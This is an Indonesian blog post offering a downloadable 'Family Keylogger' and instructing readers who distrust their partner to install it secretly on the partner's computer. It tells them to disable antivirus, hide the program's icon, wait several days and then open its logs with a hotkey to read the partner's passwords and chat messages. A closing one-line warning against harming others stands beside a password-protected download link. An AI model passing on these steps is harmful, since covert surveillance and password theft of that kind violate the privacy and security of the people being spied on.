Family Keyloger

Share on :
Free Download Family Keyloger
(Software untuk Mengetahui Log dari sebuah Komputer)


Sudah lama komputerbox tidak mengupload artikel/software.
Kali ini Saya akan membagi software buat Anda yg ingin mengetahui log dari sebuah komputer. Software ini akan sangat berguna bagi Anda yang suka berburuk sangka kepada pasangan Anda di dalam dunia maya (facebbook, twitter, dll.). Apalagi ketika Anda meminta password, tetapi tidak dikasih oleh pasangan Anda. Famili keylogerlah jawaban dari apa yang Anda cari selama ini. Karena dengan software ini, Anda dapat mengetahui password ataupun log chat pasangan Anda. Lalu bagai mana caranya mendapatkan passwordnya?
Caranya mudah, Anda tinggal downlod software keyloger, lalu install keyloger ini pada komputer/laptop pasangan Anda yang sering digunakan untuk membuka sosial media. Sebelum menginstall, Antivirus harus dimatikan. Setelah selesai menginstall, buka keyloger lalu click hide icon seperti gambar di bawah ini.

http://screenshots.en.sftcdn.net/en/scrn/67000/67082/family-keylogger-11.jpg 

Lalu biarkanlah selama beberapa hari. Setelah itu, coba Anda buka keylogernya dengan cara menekan ctrl+shift+alt+K (default). maka akan tampak log dari komputer tersebut seperti gambar di bawah ini.
http://screenshots.en.sftcdn.net/en/scrn/67000/67082/family-keylogger-3.jpg

Saran: jangan digunakan untuk hal-hal yang merugikan orang lain...!


Download Family keyloger di sini | 314 kb
Password: komputerbox.blogspot.com


0 komentar on Family Keyloger :

Post a Comment and Don't Spam!


        
Diberdayakan oleh Blogger.
 
Selalu kunjungi komputerbox.blogspot.com